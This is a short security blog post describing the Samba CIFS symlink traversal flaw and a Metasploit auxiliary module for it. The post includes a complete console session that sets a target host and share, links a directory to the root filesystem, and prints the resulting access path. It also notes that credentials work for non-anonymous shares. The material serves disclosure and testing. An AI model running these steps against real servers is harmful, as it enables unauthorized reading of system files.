Exploiting the Samba Symlink Traversal

Last updated at Wed, 27 Sep 2017 20:47:54 GMT

Last night, Kingcope uploaded a video to youtube demonstrating a logic flaw in the Samba CIFS service (this was followed by a mailing list post). This bug allows any user with write access to a file share to create a symbolic link to the root filesystem. From this link, the user can access any file on the system with their current privileges. This affects any Samba service that allows anonymous write access, however read access to the filesystem is limited by normal user-level privileges. In most cases, anonymous users are limited to the 'nobody' account, limiting the damage possible through this exploit.

A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:

$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal
 
msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.0.2
 
msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared
 
msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted
 
msf auxiliary(samba_symlink_traversal) > run
 
[*] Connecting to the server...
[*] Trying to mount writeable share 'shared'...
[*] Trying to link 'rooted' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*]  \\192.168.0.2\shared\rooted\

Keep in mind that non-anonymous shares can be used as well, just enter SMBUser and SMBPass for a valid user account.